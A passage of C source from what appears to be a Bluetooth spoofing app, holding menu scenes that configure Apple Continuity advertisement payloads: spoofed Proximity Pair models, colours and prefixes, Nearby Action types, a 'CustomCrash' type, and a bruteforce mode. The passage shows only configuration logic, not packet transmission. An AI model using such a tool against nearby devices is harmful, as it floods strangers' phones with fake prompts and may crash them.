  754. static uint8_t config_counts[ContinuityTypeCOUNT] = {
  755. [ContinuityTypeAirDrop] = 0,
  756. [ContinuityTypeProximityPair] = ConfigPpCOUNT - ConfigExtraStart - 1,
  757. [ContinuityTypeAirplayTarget] = 0,
  758. [ContinuityTypeHandoff] = 0,
  759. [ContinuityTypeTetheringSource] = 0,
  760. [ContinuityTypeNearbyAction] = ConfigNaCOUNT - ConfigExtraStart - 1,
  761. [ContinuityTypeNearbyInfo] = 0,
  762. [ContinuityTypeCustomCrash] = ConfigCcCOUNT - ConfigExtraStart - 1,
  763. };
  764. static uint8_t config_count(const Payload* payload) {
  765. const ContinuityCfg* cfg = &payload->cfg.continuity;
  766. return config_counts[cfg->type];
  767. }
  768. const Protocol protocol_continuity = {
  769. .icon = &I_apple,
  770. .get_name = get_name,
  771. .make_packet = make_packet,
  772. .extra_config = extra_config,
  773. .config_count = config_count,
  774. };
  775. static void pp_model_callback(void* _ctx, uint32_t index) {
  776. Ctx* ctx = _ctx;
  777. Payload* payload = &ctx->attack->payload;
  778. ContinuityCfg* cfg = &payload->cfg.continuity;
  779. switch(index) {
  780. case 0:
  781. payload->mode = PayloadModeRandom;
  782. scene_manager_previous_scene(ctx->scene_manager);
  783. break;
  784. case pp_models_count + 1:
  785. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpModelCustom);
  786. break;
  787. case pp_models_count + 2:
  788. payload->mode = PayloadModeBruteforce;
  789. payload->bruteforce.counter = 0;
  790. payload->bruteforce.value = cfg->data.proximity_pair.model;
  791. payload->bruteforce.size = 2;
  792. cfg->data.proximity_pair.bruteforce_mode = ContinuityPpBruteforceModel;
  793. scene_manager_previous_scene(ctx->scene_manager);
  794. break;
  795. default:
  796. if(payload->mode != PayloadModeBruteforce ||
  797. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceModel)
  798. payload->mode = PayloadModeValue;
  799. cfg->data.proximity_pair.model = pp_models[index - 1].value;
  800. scene_manager_previous_scene(ctx->scene_manager);
  801. break;
  802. }
  803. }
  804. void scene_continuity_pp_model_on_enter(void* _ctx) {
  805. Ctx* ctx = _ctx;
  806. Payload* payload = &ctx->attack->payload;
  807. ContinuityCfg* cfg = &payload->cfg.continuity;
  808. Submenu* submenu = ctx->submenu;
  809. uint32_t selected = 0;
  810. bool value = payload->mode == PayloadModeValue ||
  811. (payload->mode == PayloadModeBruteforce &&
  812. cfg->data.proximity_pair.bruteforce_mode != ContinuityPpBruteforceModel);
  813. submenu_add_item(submenu, "Random", 0, pp_model_callback, ctx);
  814. if(payload->mode == PayloadModeRandom) {
  815. selected = 0;
  816. }
  817. bool found = false;
  818. for(uint8_t i = 0; i < pp_models_count; i++) {
  819. submenu_add_item(submenu, pp_models[i].name, i + 1, pp_model_callback, ctx);
  820. if(!found && value && cfg->data.proximity_pair.model == pp_models[i].value) {
  821. found = true;
  822. selected = i + 1;
  823. }
  824. }
  825. submenu_add_item(submenu, "Custom", pp_models_count + 1, pp_model_callback, ctx);
  826. if(!found && value) {
  827. selected = pp_models_count + 1;
  828. }
  829. submenu_add_item(submenu, "Bruteforce", pp_models_count + 2, pp_model_callback, ctx);
  830. if(!value && payload->mode == PayloadModeBruteforce) {
  831. selected = pp_models_count + 2;
  832. }
  833. submenu_set_selected_item(submenu, selected);
  834. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  835. }
  836. bool scene_continuity_pp_model_on_event(void* _ctx, SceneManagerEvent event) {
  837. UNUSED(_ctx);
  838. UNUSED(event);
  839. return false;
  840. }
  841. void scene_continuity_pp_model_on_exit(void* _ctx) {
  842. Ctx* ctx = _ctx;
  843. submenu_reset(ctx->submenu);
  844. }
  845. static void pp_model_custom_callback(void* _ctx) {
  846. Ctx* ctx = _ctx;
  847. Payload* payload = &ctx->attack->payload;
  848. ContinuityCfg* cfg = &payload->cfg.continuity;
  849. if(payload->mode != PayloadModeBruteforce ||
  850. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceModel)
  851. payload->mode = PayloadModeValue;
  852. cfg->data.proximity_pair.model = (ctx->byte_store[0] << 0x08) + (ctx->byte_store[1] << 0x00);
  853. scene_manager_previous_scene(ctx->scene_manager);
  854. scene_manager_previous_scene(ctx->scene_manager);
  855. }
  856. void scene_continuity_pp_model_custom_on_enter(void* _ctx) {
  857. Ctx* ctx = _ctx;
  858. Payload* payload = &ctx->attack->payload;
  859. ContinuityCfg* cfg = &payload->cfg.continuity;
  860. ByteInput* byte_input = ctx->byte_input;
  861. byte_input_set_header_text(byte_input, "Enter custom Model Code");
  862. ctx->byte_store[0] = (cfg->data.proximity_pair.model >> 0x08) & 0xFF;
  863. ctx->byte_store[1] = (cfg->data.proximity_pair.model >> 0x00) & 0xFF;
  864. byte_input_set_result_callback(
  865. byte_input, pp_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 2);
  866. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  867. }
  868. bool scene_continuity_pp_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
  869. UNUSED(_ctx);
  870. UNUSED(event);
  871. return false;
  872. }
  873. void scene_continuity_pp_model_custom_on_exit(void* _ctx) {
  874. UNUSED(_ctx);
  875. }
  876. static void pp_color_callback(void* _ctx, uint32_t index) {
  877. Ctx* ctx = _ctx;
  878. Payload* payload = &ctx->attack->payload;
  879. ContinuityCfg* cfg = &payload->cfg.continuity;
  880. uint8_t model_index = 0;
  881. uint8_t colors_count = 0;
  882. if(payload->mode == PayloadModeValue ||
  883. (payload->mode == PayloadModeBruteforce &&
  884. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)) {
  885. for(; model_index < pp_models_count; model_index++) {
  886. if(cfg->data.proximity_pair.model == pp_models[model_index].value) {
  887. colors_count = pp_models[model_index].colors_count;
  888. break;
  889. }
  890. }
  891. }
  892. if(index == colors_count) {
  893. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpColorCustom);
  894. } else if(index == colors_count + 1U) {
  895. payload->mode = PayloadModeBruteforce;
  896. payload->bruteforce.counter = 0;
  897. payload->bruteforce.value = cfg->data.proximity_pair.color;
  898. payload->bruteforce.size = 1;
  899. cfg->data.proximity_pair.bruteforce_mode = ContinuityPpBruteforceColor;
  900. scene_manager_previous_scene(ctx->scene_manager);
  901. } else {
  902. if(payload->mode != PayloadModeBruteforce ||
  903. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)
  904. payload->mode = PayloadModeValue;
  905. cfg->data.proximity_pair.color = pp_models[model_index].colors[index].value;
  906. scene_manager_previous_scene(ctx->scene_manager);
  907. }
  908. }
  909. void scene_continuity_pp_color_on_enter(void* _ctx) {
  910. Ctx* ctx = _ctx;
  911. Payload* payload = &ctx->attack->payload;
  912. ContinuityCfg* cfg = &payload->cfg.continuity;
  913. Submenu* submenu = ctx->submenu;
  914. uint32_t selected = 0;
  915. bool value = payload->mode == PayloadModeValue ||
  916. (payload->mode == PayloadModeBruteforce &&
  917. cfg->data.proximity_pair.bruteforce_mode != ContinuityPpBruteforceColor);
  918. bool found = false;
  919. uint8_t colors_count = 0;
  920. if(payload->mode == PayloadModeValue ||
  921. (payload->mode == PayloadModeBruteforce &&
  922. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)) {
  923. for(uint8_t i = 0; i < pp_models_count; i++) {
  924. if(cfg->data.proximity_pair.model == pp_models[i].value) {
  925. colors_count = pp_models[i].colors_count;
  926. for(uint8_t j = 0; j < colors_count; j++) {
  927. submenu_add_item(
  928. submenu, pp_models[i].colors[j].name, j, pp_color_callback, ctx);
  929. if(!found && value &&
  930. cfg->data.proximity_pair.color == pp_models[i].colors[j].value) {
  931. found = true;
  932. selected = j;
  933. }
  934. }
  935. break;
  936. }
  937. }
  938. }
  939. submenu_add_item(submenu, "Custom", colors_count, pp_color_callback, ctx);
  940. if(!found && value) {
  941. selected = colors_count;
  942. }
  943. submenu_add_item(submenu, "Bruteforce", colors_count + 1, pp_color_callback, ctx);
  944. if(!value && payload->mode == PayloadModeBruteforce) {
  945. selected = colors_count + 1;
  946. }
  947. submenu_set_selected_item(submenu, selected);
  948. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  949. }
  950. bool scene_continuity_pp_color_on_event(void* _ctx, SceneManagerEvent event) {
  951. UNUSED(_ctx);
  952. UNUSED(event);
  953. return false;
  954. }
  955. void scene_continuity_pp_color_on_exit(void* _ctx) {
  956. Ctx* ctx = _ctx;
  957. submenu_reset(ctx->submenu);
  958. }
  959. static void pp_color_custom_callback(void* _ctx) {
  960. Ctx* ctx = _ctx;
  961. Payload* payload = &ctx->attack->payload;
  962. ContinuityCfg* cfg = &payload->cfg.continuity;
  963. if(payload->mode != PayloadModeBruteforce ||
  964. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)
  965. payload->mode = PayloadModeValue;
  966. cfg->data.proximity_pair.color = (ctx->byte_store[0] << 0x00);
  967. scene_manager_previous_scene(ctx->scene_manager);
  968. scene_manager_previous_scene(ctx->scene_manager);
  969. }
  970. void scene_continuity_pp_color_custom_on_enter(void* _ctx) {
  971. Ctx* ctx = _ctx;
  972. Payload* payload = &ctx->attack->payload;
  973. ContinuityCfg* cfg = &payload->cfg.continuity;
  974. ByteInput* byte_input = ctx->byte_input;
  975. byte_input_set_header_text(byte_input, "Enter custom Device Color");
  976. ctx->byte_store[0] = (cfg->data.proximity_pair.color >> 0x00) & 0xFF;
  977. byte_input_set_result_callback(
  978. byte_input, pp_color_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  979. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  980. }
  981. bool scene_continuity_pp_color_custom_on_event(void* _ctx, SceneManagerEvent event) {
  982. UNUSED(_ctx);
  983. UNUSED(event);
  984. return false;
  985. }
  986. void scene_continuity_pp_color_custom_on_exit(void* _ctx) {
  987. UNUSED(_ctx);
  988. }
  989. static void pp_prefix_callback(void* _ctx, uint32_t index) {
  990. Ctx* ctx = _ctx;
  991. Payload* payload = &ctx->attack->payload;
  992. ContinuityCfg* cfg = &payload->cfg.continuity;
  993. switch(index) {
  994. case 0:
  995. cfg->data.proximity_pair.prefix = 0x00;
  996. scene_manager_previous_scene(ctx->scene_manager);
  997. break;
  998. case pp_prefixes_count + 1:
  999. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpPrefixCustom);
  1000. break;
  1001. default:
  1002. cfg->data.proximity_pair.prefix = pp_prefixes[index - 1].value;
  1003. scene_manager_previous_scene(ctx->scene_manager);
  1004. break;
  1005. }
  1006. }
  1007. void scene_continuity_pp_prefix_on_enter(void* _ctx) {
  1008. Ctx* ctx = _ctx;
  1009. Payload* payload = &ctx->attack->payload;
  1010. ContinuityCfg* cfg = &payload->cfg.continuity;
  1011. Submenu* submenu = ctx->submenu;
  1012. uint32_t selected = 0;
  1013. bool found = false;
  1014. submenu_add_item(submenu, "Automatic", 0, pp_prefix_callback, ctx);
  1015. if(cfg->data.proximity_pair.prefix == 0x00) {
  1016. found = true;
  1017. selected = 0;
  1018. }
  1019. for(uint8_t i = 0; i < pp_prefixes_count; i++) {
  1020. submenu_add_item(submenu, pp_prefixes[i].name, i + 1, pp_prefix_callback, ctx);
  1021. if(!found && cfg->data.proximity_pair.prefix == pp_prefixes[i].value) {
  1022. found = true;
  1023. selected = i + 1;
  1024. }
  1025. }
  1026. submenu_add_item(submenu, "Custom", pp_prefixes_count + 1, pp_prefix_callback, ctx);
  1027. if(!found) {
  1028. selected = pp_prefixes_count + 1;
  1029. }
  1030. submenu_set_selected_item(submenu, selected);
  1031. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  1032. }
  1033. bool scene_continuity_pp_prefix_on_event(void* _ctx, SceneManagerEvent event) {
  1034. UNUSED(_ctx);
  1035. UNUSED(event);
  1036. return false;
  1037. }
  1038. void scene_continuity_pp_prefix_on_exit(void* _ctx) {
  1039. Ctx* ctx = _ctx;
  1040. submenu_reset(ctx->submenu);
  1041. }
  1042. static void pp_prefix_custom_callback(void* _ctx) {
  1043. Ctx* ctx = _ctx;
  1044. Payload* payload = &ctx->attack->payload;
  1045. ContinuityCfg* cfg = &payload->cfg.continuity;
  1046. cfg->data.proximity_pair.prefix = (ctx->byte_store[0] << 0x00);
  1047. scene_manager_previous_scene(ctx->scene_manager);
  1048. scene_manager_previous_scene(ctx->scene_manager);
  1049. }
  1050. void scene_continuity_pp_prefix_custom_on_enter(void* _ctx) {
  1051. Ctx* ctx = _ctx;
  1052. Payload* payload = &ctx->attack->payload;
  1053. ContinuityCfg* cfg = &payload->cfg.continuity;
  1054. ByteInput* byte_input = ctx->byte_input;
  1055. byte_input_set_header_text(byte_input, "Enter custom Prefix");
  1056. ctx->byte_store[0] = (cfg->data.proximity_pair.prefix >> 0x00) & 0xFF;
  1057. byte_input_set_result_callback(
  1058. byte_input, pp_prefix_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  1059. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  1060. }
  1061. bool scene_continuity_pp_prefix_custom_on_event(void* _ctx, SceneManagerEvent event) {
  1062. UNUSED(_ctx);
  1063. UNUSED(event);
  1064. return false;
  1065. }
  1066. void scene_continuity_pp_prefix_custom_on_exit(void* _ctx) {
  1067. UNUSED(_ctx);
  1068. }
  1069. static void na_action_callback(void* _ctx, uint32_t index) {
  1070. Ctx* ctx = _ctx;
  1071. Payload* payload = &ctx->attack->payload;
  1072. ContinuityCfg* cfg = &payload->cfg.continuity;
  1073. switch(index) {
  1074. case 0:
  1075. payload->mode = PayloadModeRandom;
  1076. scene_manager_previous_scene(ctx->scene_manager);
  1077. break;
  1078. case na_actions_count + 1:
  1079. scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaActionCustom);
  1080. break;
  1081. case na_actions_count + 2:
  1082. payload->mode = PayloadModeBruteforce;
  1083. payload->bruteforce.counter = 0;
  1084. payload->bruteforce.value = cfg->data.nearby_action.action;
  1085. payload->bruteforce.size = 1;
  1086. scene_manager_previous_scene(ctx->scene_manager);
  1087. break;
  1088. default:
  1089. payload->mode = PayloadModeValue;
  1090. cfg->data.nearby_action.action = na_actions[index - 1].value;
  1091. scene_manager_previous_scene(ctx->scene_manager);
  1092. break;
  1093. }
  1094. }
  1095. void scene_continuity_na_action_on_enter(void* _ctx) {
  1096. Ctx* ctx = _ctx;
  1097. Payload* payload = &ctx->attack->payload;
  1098. ContinuityCfg* cfg = &payload->cfg.continuity;
  1099. Submenu* submenu = ctx->submenu;
  1100. uint32_t selected = 0;
  1101. submenu_add_item(submenu, "Random", 0, na_action_callback, ctx);
  1102. if(payload->mode == PayloadModeRandom) {
  1103. selected = 0;
  1104. }
  1105. bool found = false;
  1106. for(uint8_t i = 0; i < na_actions_count; i++) {
  1107. submenu_add_item(submenu, na_actions[i].name, i + 1, na_action_callback, ctx);
  1108. if(!found && payload->mode == PayloadModeValue &&
  1109. cfg->data.nearby_action.action == na_actions[i].value) {
  1110. found = true;
  1111. selected = i + 1;
  1112. }
  1113. }
  1114. submenu_add_item(submenu, "Custom", na_actions_count + 1, na_action_callback, ctx);
  1115. if(!found && payload->mode == PayloadModeValue) {
  1116. selected = na_actions_count + 1;
  1117. }
  1118. submenu_add_item(submenu, "Bruteforce", na_actions_count + 2, na_action_callback, ctx);
  1119. if(payload->mode == PayloadModeBruteforce) {
  1120. selected = na_actions_count + 2;
  1121. }
  1122. submenu_set_selected_item(submenu, selected);
  1123. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
  1124. }
  1125. bool scene_continuity_na_action_on_event(void* _ctx, SceneManagerEvent event) {
  1126. UNUSED(_ctx);
  1127. UNUSED(event);
  1128. return false;
  1129. }
  1130. void scene_continuity_na_action_on_exit(void* _ctx) {
  1131. Ctx* ctx = _ctx;
  1132. submenu_reset(ctx->submenu);
  1133. }
  1134. static void na_action_custom_callback(void* _ctx) {
  1135. Ctx* ctx = _ctx;
  1136. Payload* payload = &ctx->attack->payload;
  1137. ContinuityCfg* cfg = &payload->cfg.continuity;
  1138. payload->mode = PayloadModeValue;
  1139. cfg->data.nearby_action.action = (ctx->byte_store[0] << 0x00);
  1140. scene_manager_previous_scene(ctx->scene_manager);
  1141. scene_manager_previous_scene(ctx->scene_manager);
  1142. }
  1143. void scene_continuity_na_action_custom_on_enter(void* _ctx) {
  1144. Ctx* ctx = _ctx;
  1145. Payload* payload = &ctx->attack->payload;
  1146. ContinuityCfg* cfg = &payload->cfg.continuity;
  1147. ByteInput* byte_input = ctx->byte_input;
  1148. byte_input_set_header_text(byte_input, "Enter custom Action Type");
  1149. ctx->byte_store[0] = (cfg->data.nearby_action.action >> 0x00) & 0xFF;
  1150. byte_input_set_result_callback(
  1151. byte_input, na_action_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  1152. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  1153. }
  1154. bool scene_continuity_na_action_custom_on_event(void* _ctx, SceneManagerEvent event) {
  1155. UNUSED(_ctx);
  1156. UNUSED(event);
  1157. return false;
  1158. }
  1159. void scene_continuity_na_action_custom_on_exit(void* _ctx) {
  1160. UNUSED(_ctx);
  1161. }
  1162. static void na_flags_callback(void* _ctx) {
  1163. Ctx* ctx = _ctx;
  1164. scene_manager_previous_scene(ctx->scene_manager);
  1165. }
  1166. void scene_continuity_na_flags_on_enter(void* _ctx) {
  1167. Ctx* ctx = _ctx;
  1168. Payload* payload = &ctx->attack->payload;
  1169. ContinuityCfg* cfg = &payload->cfg.continuity;
  1170. ByteInput* byte_input = ctx->byte_input;
  1171. byte_input_set_header_text(byte_input, "Press back for automatic");
  1172. ctx->byte_store[0] = (cfg->data.nearby_action.flags >> 0x00) & 0xFF;
  1173. byte_input_set_result_callback(
  1174. byte_input, na_flags_callback, NULL, ctx, (void*)ctx->byte_store, 1);
  1175. view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
  1176. }
  1177. bool scene_continuity_na_flags_on_event(void* _ctx, SceneManagerEvent event) {
  1178. Ctx* ctx = _ctx;
  1179. if(event.type == SceneManagerEventTypeBack) {
  1180. ctx->byte_store[0] = 0x00;
  1181. }
  1182. return false;
  1183. }
  1184. void scene_continuity_na_flags_on_exit(void* _ctx) {
  1185. Ctx* ctx = _ctx;
  1186. Payload* payload = &ctx->attack->payload;
  1187. ContinuityCfg* cfg = &payload->cfg.continuity;
  1188. cfg->data.nearby_action.flags = (ctx->byte_store[0] << 0x00);
  1189. }